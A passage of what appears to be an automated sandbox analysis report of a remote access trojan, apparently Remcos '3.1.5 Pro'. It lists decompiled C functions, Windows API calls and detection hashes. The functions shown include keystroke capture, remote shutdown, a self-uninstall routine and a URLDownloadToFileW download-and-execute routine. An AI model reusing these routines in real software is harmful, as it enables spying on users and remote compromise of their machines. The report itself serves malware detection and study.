                                • Part of subcall function 00404A6E: send.WS2_32(?,00000000,00000000,00000000), ref: 00404AE2
                              • __CxxThrowException@8.LIBVCRUNTIME ref: 004078A0
                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 004078FE
                              • FindNextFileW.KERNEL32(00000000,?), ref: 00407956
                              • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040796D
                                • Part of subcall function 00404DD5: closesocket.WS2_32(?), ref: 00404DDB
                              • FindClose.KERNEL32(00000000), ref: 00407BAB
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: Find$CloseFile$Exception@8FirstH_prologNextThrowclosesocketconnectsend
                              • String ID:
                              • API String ID: 2104358809-0
                              • Opcode ID: 55f9d0b4d494d3187606befb6d5192927cc31bf6f7193ab56803296ca8eb5cf2
                              • Instruction ID: 500d6ffaf10c8ca55e64fcd7a92a986a0ae94d1cc1e451eb4534f92e48179c39
                              • Opcode Fuzzy Hash: 55f9d0b4d494d3187606befb6d5192927cc31bf6f7193ab56803296ca8eb5cf2
                              • Instruction Fuzzy Hash: 78C16E719001099ADB14FB61CD52AEE7375AF10318F50427FE906B71E2EF38AB48CB99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 89%
                              			E004089BC(void* __ecx, intOrPtr _a4) {
                              				long _v8;
                              				void _v38;
                              				short _v40;
                              				char _v296;
                              				void* __ebx;
                              				void* __edi;
                              				struct HKL__* _t20;
                              				void* _t30;
                              				signed int _t32;
                              				void* _t36;
                              
                              				_t30 = __ecx;
                              				E00431810(_t36,  &_v296, 0, 0x100);
                              				_v40 = 0;
                              				_t32 = 7;
                              				memset( &_v38, 0, _t32 << 2);
                              				asm("stosw");
                              				_t20 = GetKeyboardLayout(GetWindowThreadProcessId(GetForegroundWindow(),  &_v8));
                              				GetKeyState(0x10);
                              				GetKeyboardState( &_v296);
                              				ToUnicodeEx( *(_t30 + 0x4c),  *(_t30 + 0x50),  &_v296,  &_v40, 0x10, 0, _t20);
                              				E0040425F(_t30, _a4,  &_v40);
                              				return _a4;
                              			}

                              0x004089d3
                              0x004089d8
                              0x004089e5
                              0x004089eb
                              0x004089ec
                              0x004089ee
                              0x00408a02
                              0x00408a0c
                              0x00408a19
                              0x00408a35
                              0x00408a42
                              0x00408a50

                              APIs
                              • GetForegroundWindow.USER32(00000000,?,00000000), ref: 004089F0
                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 004089FB
                              • GetKeyboardLayout.USER32(00000000), ref: 00408A02
                              • GetKeyState.USER32 ref: 00408A0C
                              • GetKeyboardState.USER32(?), ref: 00408A19
                              • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00408A35
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                              • String ID:
                              • API String ID: 3566172867-0
                              • Opcode ID: b02ccbf7f0dc03c4f6c19e4d88d394f0c81c31efefca9dfcc189d7371c4d50d7
                              • Instruction ID: ab76f315eabbce1fdb121dfd98bae8f760d40ea8c637dec96147df679fa50a93
                              • Opcode Fuzzy Hash: b02ccbf7f0dc03c4f6c19e4d88d394f0c81c31efefca9dfcc189d7371c4d50d7
                              • Instruction Fuzzy Hash: 6B110072900208BBDB109FE4DD49FDA77ACEB4C746F100465FA04E6191EA75AA54CBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 62%
                              			E00412598(void* __edx, void* __ebp, void* __eflags, char _a12, char _a16, void* _a128, void* _a152) {
                              				void* _t12;
                              				int _t14;
                              				int _t20;
                              				int _t22;
                              				int _t31;
                              				intOrPtr* _t64;
                              				void* _t69;
                              
                              				_t69 = __eflags;
                              				E004132F7();
                              				L00401E29( &_a16, __edx, _t69, 0);
                              				_t12 = L00405A22("0");
                              				_push(0);
                              				_t70 = _t12;
                              				if(_t12 == 0) {
                              					L00401E29( &_a12, "0", __eflags);
                              					_t14 = L00405A22("1");
                              					_push(0);
                              					__eflags = _t14;
                              					if(__eflags == 0) {
                              						L00401E29( &_a12, "1", __eflags);
                              						__eflags = L00405A22("2");
                              						if(__eflags == 0) {
                              							_t64 = GetProcAddress(LoadLibraryA("PowrProf.dll"), "SetSuspendState");
                              							L00401E29( &_a16, "2", __eflags, 0);
                              							_t62 = "3";
                              							_t20 = L00405A22("3");
                              							_push(0);
                              							__eflags = _t20;
                              							if(__eflags == 0) {
                              								L00401E29( &_a16, "3", __eflags);
                              								_t62 = "4";
                              								_t22 = L00405A22("4");
                              								__eflags = _t22;
                              								if(_t22 != 0) {
                              									_push(0);
                              									_push(0);
                              									_push(1);
                              									goto L11;
                              								}
                              							} else {
                              								_push(0);
                              								_push(0);
                              								L11:
                              								 *_t64();
                              							}
                              						} else {
                              							_push(0);
                              							_t31 = E00436079(_t28, L00401F75(L00401E29( &_a16, "2", __eflags, 1))) | 0x00000002;
                              							__eflags = _t31;
                              							goto L6;
                              						}
                              					} else {
                              						_t31 = E00436079(_t33, L00401F75(L00401E29( &_a12, "1", __eflags, 1))) | 0x00000001;
                              						goto L6;
                              					}
                              				} else {
                              					_t31 = E00436079(_t36, L00401F75(L00401E29( &_a12, "0", _t70, 1)));
                              					L6:
                              					ExitWindowsEx(_t31, ??);
                              				}
                              				L00401E54( &_a16, _t62);
                              				L00401FA7();
                              				L00401FA7();
                              				return 0;
                              			}

                              0x00412598
                              0x00412598
                              0x004125a4
                              0x004125b0
                              0x004125b9
                              0x004125ba
                              0x004125bc
                              0x004125d4
                              0x004125e0
                              0x004125e9
                              0x004125ea
                              0x004125ec
                              0x00412607
                              0x00412618
                              0x0041261a
                              0x00412661
                              0x00412663
                              0x00412668
                              0x0041266f
                              0x00412674
                              0x00412675
                              0x00412677
                              0x00412681
                              0x00412686
                              0x0041268d
                              0x00412692
                              0x00412694
                              0x0041269a
                              0x0041269b
                              0x0041269c
                              0x00000000
                              0x0041269c
                              0x00412679
                              0x00412679
                              0x0041267a
                              0x0041269e
                              0x0041269e
                              0x0041269e
                              0x0041261c
                              0x0041261c
                              0x00412635
                              0x00412635
                              0x00000000
                              0x00412635
                              0x004125ee
                              0x00412602
                              0x00000000
                              0x00412602
                              0x004125be
                              0x004125cd
                              0x00412638
                              0x0041263a
                              0x0041263a
                              0x00412d65
                              0x00412d71
                              0x00412d7d
                              0x00412d8a

                              APIs
                                • Part of subcall function 004132F7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00413304
                                • Part of subcall function 004132F7: OpenProcessToken.ADVAPI32(00000000), ref: 0041330B
                                • Part of subcall function 004132F7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0041331D
                                • Part of subcall function 004132F7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0041333C
                                • Part of subcall function 004132F7: GetLastError.KERNEL32 ref: 00413342
                              • ExitWindowsEx.USER32 ref: 0041263A
                              • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041264F
                              • GetProcAddress.KERNEL32(00000000), ref: 00412656
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                              • String ID: PowrProf.dll$SetSuspendState
                              • API String ID: 1589313981-1420736420
                              • Opcode ID: 350056446d05354f6e1d0207a4dc78e2bbb0cfcb4a01c0bf18d00743483075e6
                              • Instruction ID: e6245df6452118ac941c9a456e50b357b4a0d59a13aba4ba33676c8a529c691a
                              • Opcode Fuzzy Hash: 350056446d05354f6e1d0207a4dc78e2bbb0cfcb4a01c0bf18d00743483075e6
                              • Instruction Fuzzy Hash: 6621487160430166CA04FBB6E967AEF22599F5030DF40583FB442A71E3EE7C8D59865E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 46%
                              			E0040D455() {
                              				signed int _v32;
                              				void* _t13;
                              				void* _t22;
                              				signed int _t61;
                              				void* _t63;
                              				void* _t64;
                              				void* _t66;
                              
                              				_t63 = (_t61 & 0xfffffff8) - 0x20;
                              				while(1) {
                              					_v32 = _v32 & 0x00000000;
                              					_t52 = L00401F75(0x46c518);
                              					E00410275(_t10, "override",  &_v32);
                              					_t13 = _v32 - 1;
                              					if(_t13 == 0) {
                              						goto L5;
                              					}
                              					_t22 = _t13 - 1;
                              					if(_t22 == 0) {
                              						_push(1);
                              						_t67 = _t63 - 0x18;
                              						E00407352(0x46c500, _t63 - 0x18, _t52, __eflags, 0x46c500);
                              						_push(L"pth_unenc");
                              						E0041053C(0x80000001, L00401ECB(L00416C32( &_v32, 0x46c518)));
                              						L00401ED0();
                              						_push(1);
                              						E00402064(0x46c500, _t67 + 0x20 - 0x18, "3.1.5 Pro");
                              						_push("v");
                              						E00410497(0x46c518, L00401F75(0x46c518));
                              						L0040FB4B();
                              						ExitProcess(0);
                              					}
                              					_t74 = _t22 != 1;
                              					if(_t22 != 1) {
                              						L6:
                              						Sleep(0xbb8);
                              						continue;
                              					}
                              					E0040B107();
                              					L5:
                              					_push(1);
                              					_t64 = _t63 - 0x18;
                              					E00407352(0x46c500, _t64, _t52, _t74, 0x46c500);
                              					_push(L"pth_unenc");
                              					E0041053C(0x80000001, L00401ECB(L00416C32( &_v32, 0x46c518)));
                              					L00401ED0();
                              					_push(1);
                              					_t66 = _t64 + 0x20 - 0x18;
                              					E00402064(0x46c500, _t66, "3.1.5 Pro");
                              					_push("v");
                              					E00410497(0x46c518, L00401F75(0x46c518));
                              					_t63 = _t66 + 0x20;
                              					goto L6;
                              				}
                              			}

                              0x0040d45b
                              0x0040d46a
                              0x0040d46a
                              0x0040d480
                              0x0040d482
                              0x0040d48d
                              0x0040d490
                              0x00000000
                              0x00000000
                              0x0040d492
                              0x0040d495
                              0x0040d514
                              0x0040d516
                              0x0040d51c
                              0x0040d521
                              0x0040d53f
                              0x0040d54b
                              0x0040d550
                              0x0040d55c
                              0x0040d561
                              0x0040d56f
                              0x0040d577
                              0x0040d57e
                              0x0040d57e
                              0x0040d497
                              0x0040d49a
                              0x0040d504
                              0x0040d509
                              0x00000000
                              0x0040d509
                              0x0040d49c
                              0x0040d4a1
                              0x0040d4a1
                              0x0040d4a3
                              0x0040d4a9
                              0x0040d4ae
                              0x0040d4cc
                              0x0040d4d8
                              0x0040d4dd
                              0x0040d4df
                              0x0040d4e9
                              0x0040d4ee
                              0x0040d4fc
                              0x0040d501
                              0x00000000
                              0x0040d501

                              APIs
                                • Part of subcall function 00410275: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00410295
                                • Part of subcall function 00410275: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000), ref: 004102B3
                                • Part of subcall function 00410275: RegCloseKey.ADVAPI32(?), ref: 004102BE
                              • Sleep.KERNEL32(00000BB8), ref: 0040D509
                              • ExitProcess.KERNEL32 ref: 0040D57E
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: CloseExitOpenProcessQuerySleepValue
                              • String ID: 3.1.5 Pro$override$pth_unenc
                              • API String ID: 2281282204-3883831071
                              • Opcode ID: f2bf34d3341e83af67d9b93607e30dbd5e6aba972c6e2b026673583f8c8e9742
                              • Instruction ID: c40a5223718f3a957b604b9da94b8c1faed2f64ca342b4f7b91d7ee91612d3b8
                              • Opcode Fuzzy Hash: f2bf34d3341e83af67d9b93607e30dbd5e6aba972c6e2b026673583f8c8e9742
                              • Instruction Fuzzy Hash: F221F371F4030027D608BAB68D57B6E3556ABC0718F50443EF9026B2D2FEBD9A44879F
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 94%
                              			E0044926C(void* __ecx, signed int _a4, intOrPtr _a8) {
                              				short _v8;
                              				short _t17;
                              				signed int _t18;
                              				signed int _t23;
                              				signed int _t25;
                              				signed int _t26;
                              				signed int _t27;
                              				void* _t30;
                              				void* _t31;
                              				intOrPtr _t32;
                              				intOrPtr _t33;
                              				intOrPtr* _t36;
                              				intOrPtr* _t37;
                              
                              				_push(__ecx);
                              				_t23 = _a4;
                              				if(_t23 == 0) {
                              					L21:
                              					_t12 = _a8 + 8; // 0xfde8fe81
                              					if(GetLocaleInfoW( *_t12, 0x20001004,  &_v8, 2) != 0) {
                              						_t17 = _v8;
                              						if(_t17 == 0) {
                              							_t17 = GetACP();
                              						}
                              						L25:
                              						return _t17;
                              					}
                              					L22:
                              					_t17 = 0;
                              					goto L25;
                              				}
                              				_t18 = 0;
                              				if( *_t23 == 0) {
                              					goto L21;
                              				}
                              				_t36 = 0x459f98;
                              				_t25 = _t23;
                              				while(1) {
                              					_t30 =  *_t25;
                              					if(_t30 !=  *_t36) {
                              						break;
                              					}
                              					if(_t30 == 0) {
                              						L7:
                              						_t26 = _t18;
                              						L9:
                              						if(_t26 == 0) {
                              							goto L21;
                              						}
                              						_t37 = 0x459fa0;
                              						_t27 = _t23;
                              						while(1) {
                              							_t31 =  *_t27;
                              							if(_t31 !=  *_t37) {
                              								break;
                              							}
                              							if(_t31 == 0) {
                              								L17:
                              								if(_t18 != 0) {
                              									_t17 = E0043604F(_t23, _t23);
                              									goto L25;
                              								}
                              								_t8 = _a8 + 8; // 0xfde8fe81
                              								if(GetLocaleInfoW( *_t8, 0x2000000b,  &_v8, 2) == 0) {
                              									goto L22;
                              								}
                              								_t17 = _v8;
                              								goto L25;
                              							}
                              							_t32 =  *((intOrPtr*)(_t27 + 2));
                              							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
                              								break;
                              							}
                              							_t27 = _t27 + 4;
                              							_t37 = _t37 + 4;
                              							if(_t32 != 0) {
                              								continue;
                              							}
                              							goto L17;
                              						}
                              						asm("sbb eax, eax");
                              						_t18 = _t18 | 0x00000001;
                              						goto L17;
                              					}
                              					_t33 =  *((intOrPtr*)(_t25 + 2));
                              					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
                              						break;
                              					}
                              					_t25 = _t25 + 4;
                              					_t36 = _t36 + 4;
                              					if(_t33 != 0) {
                              						continue;
                              					}
                              					goto L7;
                              				}
                              				asm("sbb edx, edx");
                              				_t26 = _t25 | 0x00000001;
                              				goto L9;
                              			}

                              APIs
                              • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0044958B,?,00000000), ref: 00449305
                              • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0044958B,?,00000000), ref: 0044932E
                              • GetACP.KERNEL32(?,?,0044958B,?,00000000), ref: 00449343
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: InfoLocale
                              • String ID: ACP$OCP
                              • API String ID: 2299586839-711371036
                              • Opcode ID: 46287128e20fa306cd593820d674ce5555d7ecb4dfbfa4eea6010efed54f43df
                              • Instruction ID: 570c54974e689fd34d1e6bcab7248841df2efce4c8a6e9186f0595708dde5153
                              • Opcode Fuzzy Hash: 46287128e20fa306cd593820d674ce5555d7ecb4dfbfa4eea6010efed54f43df
                              • Instruction Fuzzy Hash: C1212822600101BBFB30CF64C802A9773A6FF59F55B568866ED09D7341E776DD01E398
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0040D41E(void** __ecx) {
                              				void* _t3;
                              				long _t4;
                              				void** _t5;
                              				struct HRSRC__* _t7;
                              
                              				_t5 = __ecx;
                              				_t7 = FindResourceA(0, "SETTINGS", 0xa);
                              				_t3 = LockResource(LoadResource(0, _t7));
                              				_t4 = SizeofResource(0, _t7);
                              				 *_t5 = _t3;
                              				return _t4;
                              			}

                              APIs
                              • FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 0040D42C
                              • LoadResource.KERNEL32(00000000,00000000,?,?,?,0040CFD9), ref: 0040D437
                              • LockResource.KERNEL32(00000000,?,?,?,0040CFD9), ref: 0040D43E
                              • SizeofResource.KERNEL32(00000000,00000000,?,?,?,0040CFD9), ref: 0040D449
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: Resource$FindLoadLockSizeof
                              • String ID: SETTINGS
                              • API String ID: 3473537107-594951305
                              • Opcode ID: c908c3803409cf7171344093e449dd1e134e4aad92bc91585c3c664446313f73
                              • Instruction ID: 24a513b8d2ab5e094724d90079fe90a958381d8b28c7bf08dd7741c770137eef
                              • Opcode Fuzzy Hash: c908c3803409cf7171344093e449dd1e134e4aad92bc91585c3c664446313f73
                              • Instruction Fuzzy Hash: A3E0EC72740350BBD6201BA16C5DF4B6A68DB85FA3F000465F601CA1D5CAB5C9008B65
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 89%
                              			E00449440(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, short* _a8, short* _a12) {
                              				signed int _v8;
                              				int _v12;
                              				int _v16;
                              				char _v20;
                              				signed int* _v24;
                              				short* _v28;
                              				void* __ebp;
                              				signed int _t39;
                              				void* _t45;
                              				signed int* _t46;
                              				signed int _t47;
                              				short* _t48;
                              				int _t49;
                              				short* _t56;
                              				short* _t57;
                              				short* _t58;
                              				int _t66;
                              				int _t68;
                              				short* _t72;
                              				intOrPtr _t75;
                              				void* _t77;
                              				short* _t78;
                              				intOrPtr _t85;
                              				short* _t89;
                              				short* _t92;
                              				void* _t94;
                              				short** _t102;
                              				short* _t103;
                              				signed int _t105;
                              				signed short _t108;
                              				signed int _t109;
                              				void* _t110;
                              
                              				_t39 =  *0x46a00c; // 0x5d382218
                              				_v8 = _t39 ^ _t109;
                              				_t89 = _a12;
                              				_t105 = _a4;
                              				_v28 = _a8;
                              				_v24 = E00440972(_t89, __ecx, __edx) + 0x50;
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosd");
                              				_t45 = E00440972(_t89, __ecx, __edx);
                              				_t99 = 0;
                              				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
                              				_t92 = _t105 + 0x80;
                              				_t46 = _v24;
                              				 *_t46 = _t105;
                              				_t102 =  &(_t46[1]);
                              				 *_t102 = _t92;
                              				if(_t92 != 0 &&  *_t92 != 0) {
                              					_t85 =  *0x459f94; // 0x17
                              					E004493E3(0, 0x459e80, _t85 - 1, _t102);
                              					_t46 = _v24;
                              					_t110 = _t110 + 0xc;
                              					_t99 = 0;
                              				}
                              				_v20 = _t99;
                              				_t47 =  *_t46;
                              				if(_t47 == 0 ||  *_t47 == _t99) {
                              					_t48 =  *_t102;
                              					__eflags = _t48;
                              					if(_t48 == 0) {
                              						L19:
                              						_v20 = 0x104;
                              						_t49 = GetUserDefaultLCID();
                              						_v12 = _t49;
                              						_v16 = _t49;
                              						goto L20;
                              					}
                              					__eflags =  *_t48 - _t99;
                              					if( *_t48 == _t99) {
                              						goto L19;
                              					}
                              					L00448D80(_t92, _t99,  &_v20);
                              					_pop(_t92);
                              					goto L20;
                              				} else {
                              					_t72 =  *_t102;
                              					if(_t72 == 0 ||  *_t72 == _t99) {
                              						L00448E66(_t92, _t99,  &_v20);
                              					} else {
                              						L00448DCB(_t92, _t99,  &_v20);
                              					}
                              					_pop(_t92);
                              					if(_v20 != 0) {
                              						_t103 = 0;
                              						__eflags = 0;
                              						goto L25;
                              					} else {
                              						_t75 =  *0x459e7c; // 0x41
                              						_t77 = E004493E3(_t99, 0x459b70, _t75 - 1, _v24);
                              						_t110 = _t110 + 0xc;
                              						if(_t77 == 0) {
                              							L20:
                              							_t103 = 0;
                              							__eflags = 0;
                              							L21:
                              							if(_v20 != 0) {
                              								L25:
                              								asm("sbb esi, esi");
                              								_t108 = E0044926C(_t92,  ~_t105 & _t105 + 0x00000100,  &_v20);
                              								_pop(_t94);
                              								__eflags = _t108;
                              								if(_t108 == 0) {
                              									goto L22;
                              								}
                              								__eflags = _t108 - 0xfde8;
                              								if(_t108 == 0xfde8) {
                              									goto L22;
                              								}
                              								__eflags = _t108 - 0xfde9;
                              								if(_t108 == 0xfde9) {
                              									goto L22;
                              								}
                              								_t56 = IsValidCodePage(_t108 & 0x0000ffff);
                              								__eflags = _t56;
                              								if(_t56 == 0) {
                              									goto L22;
                              								}
                              								_t57 = IsValidLocale(_v16, 1);
                              								__eflags = _t57;
                              								if(_t57 == 0) {
                              									goto L22;
                              								}
                              								_t58 = _v28;
                              								__eflags = _t58;
                              								if(__eflags != 0) {
                              									 *_t58 = _t108;
                              								}
                              								E004412C5(_t89, _t94, _t99, _t103, _t108, __eflags, _v16,  &(_v24[0x94]), 0x55, _t103);
                              								__eflags = _t89;
                              								if(__eflags == 0) {
                              									L36:
                              									L23:
                              									return E0042F61B(_v8 ^ _t109);
                              								}
                              								_t33 =  &(_t89[0x90]); // 0x43d072
                              								E004412C5(_t89, _t94, _t99, _t103, _t108, __eflags, _v16, _t33, 0x55, _t103);
                              								_t66 = GetLocaleInfoW(_v16, 0x1001, _t89, 0x40);
                              								__eflags = _t66;
                              								if(_t66 == 0) {
                              									goto L22;
                              								}
                              								_t36 =  &(_t89[0x40]); // 0x43cfd2
                              								_t68 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
                              								__eflags = _t68;
                              								if(_t68 == 0) {
                              									goto L22;
                              								}
                              								_t38 =  &(_t89[0x80]); // 0x43d052
                              								E0043A76D(_t38, _t108, _t38, 0x10, 0xa);
                              								goto L36;
                              							}
                              							L22:
                              							goto L23;
                              						}
                              						_t78 =  *_t102;
                              						_t103 = 0;
                              						if(_t78 == 0 ||  *_t78 == 0) {
                              							L00448E66(_t92, _t99,  &_v20);
                              						} else {
                              							L00448DCB(_t92, _t99,  &_v20);
                              						}
                              						_pop(_t92);
                              						goto L21;
                              					}
                              				}
                              			}

                              APIs
                                • Part of subcall function 00440972: GetLastError.KERNEL32(00000000,?,00434E55,?,?,?,00439275,?,00428772,00000000,?,00000000,?,?,00428772), ref: 00440976
                                • Part of subcall function 00440972: _free.LIBCMT ref: 004409A9
                                • Part of subcall function 00440972: SetLastError.KERNEL32(00000000,00439275,?,00428772,00000000,?,00000000,?,?,00428772), ref: 004409EA
                                • Part of subcall function 00440972: _abort.LIBCMT ref: 004409F0
                                • Part of subcall function 00440972: _free.LIBCMT ref: 004409D1
                                • Part of subcall function 00440972: SetLastError.KERNEL32(00000000,00439275,?,00428772,00000000,?,00000000,?,?,00428772), ref: 004409DE
                              • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044954C
                              • IsValidCodePage.KERNEL32(00000000), ref: 004495A7
                              • IsValidLocale.KERNEL32(?,00000001), ref: 004495B6
                              • GetLocaleInfoW.KERNEL32(?,00001001,0043CF52,00000040,?,0043D072,00000055,00000000,?,?,00000055,00000000), ref: 004495FE
                              • GetLocaleInfoW.KERNEL32(?,00001002,0043CFD2,00000040), ref: 0044961D
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                              • String ID:
                              • API String ID: 745075371-0
                              • Opcode ID: 4f29291a398986d9b346dab9a49201bc34959112b7168d17cffe74ad61a86425
                              • Instruction ID: 8a1905ba9bd6499ab3f410366c50d1caeed45d39038b25d0bae0cc1b30d53ac2
                              • Opcode Fuzzy Hash: 4f29291a398986d9b346dab9a49201bc34959112b7168d17cffe74ad61a86425
                              • Instruction Fuzzy Hash: 67517172A00209ABFF11DFA5DC41ABF73B8AF04701F14046AE915E7291E778DE01DB69
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0043C9B0,?,00000004), ref: 004410BC
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: InfoLocale
                              • String ID: GetLocaleInfoEx$@
                              • API String ID: 2299586839-3007343520
                              • Opcode ID: e28a724808ccbae7fec18c7bc115137aef7f827691145524245741caf7b7c823
                              • Instruction ID: a7f704755b5d2e67fe8756e3b063992e3f12ebeeb1607a3b83353fcb2a10ec15
                              • Opcode Fuzzy Hash: e28a724808ccbae7fec18c7bc115137aef7f827691145524245741caf7b7c823
                              • Instruction Fuzzy Hash: ADF02B31700208FBDB116F61DC02F6F7B60EF44B01F50412AFC05272A2DB798D649A9E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 77%
                              			E0041242F(signed int __eax, void* __ebx, void* __ecx, void* __ebp, char _a12, char _a16, char _a20, char _a32, void* _a112, void* _a136) {
                              				char _v0;
                              				intOrPtr* _t16;
                              				void* _t18;
                              				void* _t22;
                              				void* _t31;
                              				void* _t49;
                              				void* _t56;
                              				void* _t61;
                              
                              				_t31 = __ebx;
                              				_pop(_t49);
                              				 *__eax =  *__eax | __eax;
                              				asm("rcl dword [ebx+0x24e9ffff], cl");
                              				 *(__eax + __ecx) =  *(__eax + __ecx) | __eax + __ecx;
                              				 *((intOrPtr*)(_t49 + 0x64)) =  *((intOrPtr*)(_t49 + 0x64)) + __ecx;
                              				do {
                              					Sleep(0x64);
                              					_t61 =  *0x46bd6c - _t31; // 0x0
                              				} while (_t61 != 0);
                              				_t16 = L00401F75(L00401E29( &_a20, _t49, _t61, 0));
                              				_t18 = L00401F75(L00401E29( &_a16, _t49, _t61, 1));
                              				_t50 =  *_t16;
                              				E004179B3( &_a32,  *_t16, _t18);
                              				_t22 = L00401F75(L00401E29( &_a12,  *_t16, _t61, 2));
                              				__imp__URLDownloadToFileW(0, _t22, L00401ECB( &_a32), 0, 0);
                              				_t62 = _t22;
                              				if(_t22 == 0) {
                              					E00407352(0, _t56 - 0x18, _t50, _t62,  &_a20);
                              					E0040B465();
                              				}
                              				L00401ED0();
                              				L00401E54( &_v0, _t50);
                              				L00401FA7();
                              				L00401FA7();
                              				return 0;
                              			}

                              APIs
                              • Sleep.KERNEL32 ref: 0041243F
                              • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004124A1
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: DownloadFileSleep
                              • String ID:
                              • API String ID: 1931167962-0
                              • Opcode ID: 54b4a893ada7f1f6ad4a0e2a5354f4fb2dcd91b2d7c7171089b06096d538c4a8
                              • Instruction ID: 3a50cae3c82b3ce372d535e7f9d3fad8a6779efd93a680446f7f936b56fe5819
                              • Opcode Fuzzy Hash: 54b4a893ada7f1f6ad4a0e2a5354f4fb2dcd91b2d7c7171089b06096d538c4a8
                              • Instruction Fuzzy Hash: CA1175715083019BC714FF72D8569AE73A4AF50308F40087FF842961E2EF7C9949C65A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: HeapProcess
                              • String ID:
                              • API String ID: 54951025-0
                              • Opcode ID: c8a6c7df5d08b87816ed76a02ba7c524f2a39d67e6166e759cef680a43040ea0
                              • Instruction ID: 28f866089aaf05a4cb9890c2cb3393caa779ee160297bb8b3d9052280f0245bb
                              • Opcode Fuzzy Hash: c8a6c7df5d08b87816ed76a02ba7c524f2a39d67e6166e759cef680a43040ea0
                              • Instruction Fuzzy Hash: 05A001706057018B97508FBAAA4920A3AA9AA466D27158079A405C5A61EB74C9909B8A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0040D072() {
                              				_Unknown_base(*)()* _t2;
                              				_Unknown_base(*)()* _t24;
                              
                              				_t2 = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExA");
                              				 *0x46bd2c = _t2;
                              				if(_t2 == 0) {
                              					 *0x46bd2c = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExA");
                              				}
                              				 *0x46bd20 = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExW");
                              				if( *0x46bd2c == 0) {
